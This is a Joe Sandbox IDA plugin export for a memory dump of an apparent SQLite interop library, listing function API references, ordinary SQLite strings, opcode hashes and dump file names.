                                                                                                                                                                                                                                      • Instruction ID: 4c2d2fa32e8175179417d98cc7c87be8290f07b2d81ba0de2a95bda31bde4891
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72d4e76fdd83705908e81b7e26c21953da9396721a69e2673f232ba111e31d01
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EE1893091D2454FD714CE2DC880F66BBE2DF46329F0845EAD9988F146F73EDA8687A1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • vtable constructor failed: %s, xrefs: 6BC2B5D1
                                                                                                                                                                                                                                      • hidden, xrefs: 6BC2B713
                                                                                                                                                                                                                                      • vtable constructor did not declare schema: %s, xrefs: 6BC2B655
                                                                                                                                                                                                                                      • vtable constructor called recursively: %s, xrefs: 6BC2B572
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                                      • API String ID: 0-1299490920
                                                                                                                                                                                                                                      • Opcode ID: 06b08d919b45a7a0690c6936d5ea0dabb71af5c0a7032ac27e50795e9c1937e5
                                                                                                                                                                                                                                      • Instruction ID: 4d15ae29540f9e57a431f8e9bd725780d2a53ea0a6a5a35edd9f5af08eab7332
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06b08d919b45a7a0690c6936d5ea0dabb71af5c0a7032ac27e50795e9c1937e5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6F18270E152059FDB00CF68C481A9ABBF5FF49308F1485A9E959DF301E739EA56CBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC5AB22
                                                                                                                                                                                                                                      • SI9a326fe0ddbebf12.SQLITE.INTEROP(-00008000,00000000), ref: 6BC5AC39
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC5AC6C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • recovered %d frames from WAL file %s, xrefs: 6BC5AEAC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I9a326fe0ddbebf12.Unothrow_t@std@@@__ehfuncinfo$??2@_memset
                                                                                                                                                                                                                                      • String ID: recovered %d frames from WAL file %s
                                                                                                                                                                                                                                      • API String ID: 4193966855-1429783703
                                                                                                                                                                                                                                      • Opcode ID: dacadefef50d78a9852a45da04bffaab15e17d3e59f8a416c59ac83eeb9b56fe
                                                                                                                                                                                                                                      • Instruction ID: 1540fa1eb81f0b3b7519ca28b7cea8f3cdc45efafcb4abea8fda80819c6cf7f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dacadefef50d78a9852a45da04bffaab15e17d3e59f8a416c59ac83eeb9b56fe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AED1ACB2E106049FD714CFA9C891B9EB7F5FF88300F104569E546AB350E778EAA1CB64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC6450B
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 6BC64555
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0003544F,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC647E5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC647DE
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC647D9
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC647CF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d._memmove_memset
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 1567147133-2469029621
                                                                                                                                                                                                                                      • Opcode ID: f1b4202d26362df43b6bad7bd1b0a36cca5435785781d55ebb2ac0c59b0e0e72
                                                                                                                                                                                                                                      • Instruction ID: 78946abdf37db77f0c012b1cbeda0603da1592425468d2b04cab03358955d741
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b4202d26362df43b6bad7bd1b0a36cca5435785781d55ebb2ac0c59b0e0e72
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6D19F71A252018FDB18CF28C4E1F5A37A5FF41389F1440A9DD158F24AF739DA92CB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011E43,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,?,?,?,?,6BC6B7A4,00000000,?,00000000,00000000), ref: 6BC60355
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011E52,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,?,?,?,?,6BC6B7A4,00000000,?,00000000,00000000), ref: 6BC603A1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 9c072eaa5168dcd57ddb73df08ebca3de70b7b7ace5060f5dcc7fa68d858b21e
                                                                                                                                                                                                                                      • Instruction ID: 8da7294ef00cab0ddad5a4e1d64bc9096b0f8c39f1af11e84b9a312369373d9c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c072eaa5168dcd57ddb73df08ebca3de70b7b7ace5060f5dcc7fa68d858b21e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65B17D71A183019FC704CF29D4C0A6AB7E5FBC8754F04866DE959AB341F738EA54CBA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC22A44
                                                                                                                                                                                                                                        • Part of subcall function 6BCC5630: _memset.LIBCMT ref: 6BCC5737
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID: L* N* Co$categories$remove_diacritics$separators$tokenchars
                                                                                                                                                                                                                                      • API String ID: 2102423945-414796364
                                                                                                                                                                                                                                      • Opcode ID: c148081b8f043bf1927d8ff4012dc23fcd07d51d8a8120582c2e5931548df0fe
                                                                                                                                                                                                                                      • Instruction ID: 6998d350b28d50537b56f70528a9e52734d59ec79b254564a883c4fe1cf928cd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c148081b8f043bf1927d8ff4012dc23fcd07d51d8a8120582c2e5931548df0fe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8B13670A392528BFB158F28842572ABBA0BF42709F4405ADE8D59F241FB3CD746C792
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI216a233b40cb7147.SQLITE.INTEROP(?,00000000), ref: 6BC4A2EF
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BC4A302
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BC4A32C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I8b0d9e6837e61abc.$I216a233b40cb7147.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 305067579-0
                                                                                                                                                                                                                                      • Opcode ID: 0be29c240fb4f2570628a50f398d276dd53348b12cc71669e80ea7a03bbf4137
                                                                                                                                                                                                                                      • Instruction ID: 2e27e35fe4117b9b8fc6e2e9beace78c1a82cab8e0947f45f9a132d7343127c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0be29c240fb4f2570628a50f398d276dd53348b12cc71669e80ea7a03bbf4137
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89A1A0B1A193018FD310CF68C481A5ABBF5EBC5328F14497DF89987311E73AEB458B92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24C51
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24CA2
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24D99
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24DC3
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24DD0
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC24DF2
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24E37
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.$_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1480580083-0
                                                                                                                                                                                                                                      • Opcode ID: 663e6b86d17ab2a7b6f2ee2359fe2e760fa0c2d1de033a7919c84e4e218b2c80
                                                                                                                                                                                                                                      • Instruction ID: 2927c3e845ce2efd82f01a2994f753ee997e151b04656b5fe1570da4a7ce4e31
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 663e6b86d17ab2a7b6f2ee2359fe2e760fa0c2d1de033a7919c84e4e218b2c80
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25A14AB1A197019FD710CF68D880A5BB7F4BF88718F104A5DF9998B311E739EA05CB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B224,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?), ref: 6BCC3038
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$BINARY$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$no such table column: %s.%s
                                                                                                                                                                                                                                      • API String ID: 2981141233-502253091
                                                                                                                                                                                                                                      • Opcode ID: 5dbca51f7359c77e1f7e23d6a9d60f62f5a68570b8844a6400cec6d4519be8e3
                                                                                                                                                                                                                                      • Instruction ID: a8204a2c7674e778fa7ac207d9da5fa86df180628d527b16ce3f197b4049df48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dbca51f7359c77e1f7e23d6a9d60f62f5a68570b8844a6400cec6d4519be8e3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 118181B0E112199BDB00CFA5C891BAFB7B4BF54704F1050A9E814EB341E778DB41CB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BC4AF95
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(?,00000000), ref: 6BC4AFA2
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP(00000000), ref: 6BC4AFC2
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP(?,00000000), ref: 6BC4AFCD
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BC4B037
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BC4B06B
                                                                                                                                                                                                                                      • SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC4B155
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I8b0d9e6837e61abc.$Iffb8076c269e2a85.$I1bf8975e567ea97a.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1260191962-0
                                                                                                                                                                                                                                      • Opcode ID: 1db8a78617f4db27c8dce47972731afd61e48b2bb7d85db8a0854d6974992630
                                                                                                                                                                                                                                      • Instruction ID: 551b63206435859d8ec25e77a6b7a4a2d9043a7e629318feed8fa5e3cd5f0ae9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1db8a78617f4db27c8dce47972731afd61e48b2bb7d85db8a0854d6974992630
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D71ADB1A297018BD710CF34C89061FBBF1AF8A604F1449ADE8A99B301F739DB45C792
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC48AE4
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP(?), ref: 6BC48B62
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BC48B7C
                                                                                                                                                                                                                                      • SIdace78b5300c999f.SQLITE.INTEROP(?,00000007,00000000,000000FF), ref: 6BC48CEF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I8b0d9e6837e61abc.Idace78b5300c999f.Iffb8076c269e2a85._memset
                                                                                                                                                                                                                                      • String ID: %g${%lld
                                                                                                                                                                                                                                      • API String ID: 3673669252-3707171336
                                                                                                                                                                                                                                      • Opcode ID: bfa5e1eddce459564079b202f3094dd634a77b6c5a44a947b5818d33cd22db07
                                                                                                                                                                                                                                      • Instruction ID: 02112e6ce0d9192c4cb5aeec6d6799b0810613612d61206f6672c2cc29b3ea3a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfa5e1eddce459564079b202f3094dd634a77b6c5a44a947b5818d33cd22db07
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7961D2B05193918FD310DF388881A5BBBE1AF96308F04496DE9D987381F739E709CB96
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 6BCA020B
                                                                                                                                                                                                                                      • sqlite_stat4, xrefs: 6BCA02CE
                                                                                                                                                                                                                                      • SELECT idx,count(*) FROM %Q.sqlite_stat4 GROUP BY idx, xrefs: 6BCA02E9
                                                                                                                                                                                                                                      • sqlite_stat1, xrefs: 6BCA01E4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: SELECT idx,count(*) FROM %Q.sqlite_stat4 GROUP BY idx$SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1$sqlite_stat4
                                                                                                                                                                                                                                      • API String ID: 0-291810292
                                                                                                                                                                                                                                      • Opcode ID: 0cb14ff2b498979309643468d60dd2a6a247673499bd2fa6ecd7f415691fd311
                                                                                                                                                                                                                                      • Instruction ID: 97def3ba3ae090dd4c1fb452746d3411db8e666eabd7b4557304159576fbb053
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0cb14ff2b498979309643468d60dd2a6a247673499bd2fa6ecd7f415691fd311
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8671B570E217169BEB01DFA4C881BAEB7B4BF09355F400299DD18AB201F738EA45CBD1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BCE1E56
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE1EC1
